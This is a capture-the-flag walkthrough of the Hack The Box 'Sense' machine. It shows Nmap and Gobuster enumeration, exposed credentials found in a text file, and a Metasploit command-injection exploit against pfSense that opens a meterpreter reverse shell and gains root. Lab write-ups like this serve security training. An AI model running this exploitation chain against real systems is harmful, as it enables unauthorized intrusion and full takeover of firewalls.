___ ___ _________ ________ |\ \|\ \|\___ ___\\ __ \ ___ \ \ \\\ \|___ \ \_\ \ \|\ /_|\__\ \ \ __ \ \ \ \ \ \ __ \|__| \ \ \ \ \ \ \ \ \ \ \|\ \ ___ \ \__\ \__\ \ \__\ \ \_______\|\__\ \|__|\|__| \|__| \|_______|\|__| ________ _______ ________ ________ _______ |\ ____\|\ ___ \ |\ ___ \|\ ____\|\ ___ \ \ \ \___|\ \ __/|\ \ \\ \ \ \ \___|\ \ __/| \ \_____ \ \ \_|/_\ \ \\ \ \ \_____ \ \ \_|/__ \|____|\ \ \ \_|\ \ \ \\ \ \|____|\ \ \ \_|\ \ ____\_\ \ \_______\ \__\\ \__\____\_\ \ \_______\ |\_________\|_______|\|__| \|__|\_________\|_______| \|_________| \|_________|
Hack The Box's Sense is an Easy OpenBSD machine that features pfSense, an open-source firewall software. This machine uses basic directory brute-forcing using Gobuster to search for a user credential text file to gain access to the firewall, followed by an injection attack to gain root access to the machine.
Once starting the machine on HTB and connecting to your HTB VPN, we will start by opening our terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.
ping 10.10.10.60
You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. Once confirming the network is up and running, it's time to move to enumeration using Nmap.
Start by doing a quick service scan using Nmap. We will use the -sV switch to enable version detection. You can learn more about Nmap here.
nmap -sV 10.10.10.60 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-02 11:17 CDT Nmap scan report for 10.10.10.60 Host is up (0.0091s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http lighttpd 1.4.35 443/tcp open ssl/https? Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.98 seconds
We can see a web server running. Let's navigate to the site by entering the target's ip address in our web browser. Upon inspection we can see a login page for pfSense, an open-source firewall software based in FreeBSD. We can complete a quick Google search for the default credentials for pfSense and find the default username is "admin" and the password is "pfsense". When trying these default credentials, we are notified they are not correct. Let's move on to using Gobuster to brute-force directories on the server. We'll search for .php and .txt files using the directory-list-2.3-medium.txt wordlist.
gobuster dir -u https://10.10.10.60/ -t 50 -x php,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: https://10.10.10.60/ [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: php,txt [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /index.php (Status: 200) [Size: 6690] /help.php (Status: 200) [Size: 6689] /themes (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/] /stats.php (Status: 200) [Size: 6690] /css (Status: 301) [Size: 0] [--> https://10.10.10.60/css/] /edit.php (Status: 200) [Size: 6689] /includes (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/] /license.php (Status: 200) [Size: 6692] /system.php (Status: 200) [Size: 6691] /status.php (Status: 200) [Size: 6691] /javascript (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/] /changelog.txt (Status: 200) [Size: 271] /classes (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/] /exec.php (Status: 200) [Size: 6689] /widgets (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/] /graph.php (Status: 200) [Size: 6690] /tree (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/] /wizard.php (Status: 200) [Size: 6691] /shortcuts (Status: 301) [Size: 0] [--> https://10.10.10.60/shortcuts/] /pkg.php (Status: 200) [Size: 6688] /installer (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/] /wizards (Status: 301) [Size: 0] [--> https://10.10.10.60/wizards/] /xmlrpc.php (Status: 200) [Size: 384] /reboot.php (Status: 200) [Size: 6691] /interfaces.php (Status: 200) [Size: 6695] /csrf (Status: 301) [Size: 0] [--> https://10.10.10.60/csrf/] /system-users.txt (Status: 200) [Size: 106] /filebrowser (Status: 301) [Size: 0] [--> https://10.10.10.60/filebrowser/]
After some time, we will notice a /systems-users.txt, highlighted above in orange. This file is interesting because there could be user login information within the text file. We can view this file by navigating to the path on the web server by using our web browser. On my spawned HTB machine it would be https://10.10.10.60/system-users.txt. We get the following page with a support ticket containing credentials:
####Support ticket### Please create the following user username: Rohit password: company defaults
We see the username listed as "Rohit" and the password as "company defaults". After testing these credentials on the pfSense login page, we see we are not granted access. But let's try the default pfSense password, "pfsense". Upon using these credentials we see we are granted access!
Let's fire-up Metasploit and search for potential exploits for pfSense:
msfconsole Metasploit tip: To save all commands executed since start up to a file, use the makerc command _ _ / \ /\ __ _ __ /_/ __ | |\ / | _____ \ \ ___ _____ | | / \ _ \ \ | | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| |_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ =[ metasploit v6.3.44-dev ] + -- --=[ 2376 exploits - 1232 auxiliary - 416 post ] + -- --=[ 1391 payloads - 46 encoders - 11 nops ] + -- --=[ 9 evasion ] Metasploit Documentation: https://docs.metasploit.com/ [msf](Jobs:0 Agents:0) >> search pfsense Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/http/pfsense_clickjacking 2017-11-21 normal No Clickjacking Vulnerability In CSRF Error Page pfSense 1 exploit/unix/http/pfsense_diag_routes_webshell 2022-02-23 excellent Yes pfSense Diag Routes Web Shell Upload 2 exploit/unix/http/pfsense_config_data_exec 2023-03-18 excellent Yes pfSense Restore RRD Data Command Injection 3 exploit/unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE 4 exploit/unix/http/pfsense_group_member_exec 2017-11-06 excellent Yes pfSense authenticated group member RCE 5 exploit/unix/http/pfsense_pfblockerng_webshell 2022-09-05 great Yes pfSense plugin pfBlockerNG unauthenticated RCE as root Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/http/pfsense_pfblockerng_webshell [msf](Jobs:0 Agents:0) >>
We see option #3 shows a module for an injection attack granting authentication. You can read more about this specific exploit on Rapid7's website here. Let's select this attack and fill out the required exploit options:
use 3 [*] Using configured payload php/meterpreter/reverse_tcp [msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> options Module options (exploit/unix/http/pfsense_graph_injection_exec): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD pfsense yes Password to login with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit /basics/using-metasploit.html RPORT 443 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections USERNAME admin yes User to login with VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target View the full module info with the info, or info -d command. [msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set RHOSTS 10.10.10.60 RHOSTS => 10.10.10.60 [msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set USERNAME rohit USERNAME => rohit [msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set LHOST tun0 LHOST => 10.10.14.6 [msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >>
We set the RHOSTS to the target ip address, the USERNAME to "rohit", and the LHOST to our desired listening ip address for the reverse TCP connection. We can now run this exploit using "exploit":
exploit [*] Started reverse TCP handler on 10.10.14.6:4444 [*] Detected pfSense 2.1.3-RELEASE, uploading intial payload [*] Payload uploaded successfully, executing [*] Sending stage (39927 bytes) to 10.10.10.60 [+] Deleted uz [*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.60:53021) at 2024-10-02 12:06:53 -0500 (Meterpreter 1)(/var/db/rrd) > getuid Server username: root (Meterpreter 1)(/var/db/rrd) >
Once the reverse TCP connection is successful, we can use the "getuid" command to see we now have root access to the machine! You can now navigate through the target system to obtain the root and user .txt flags.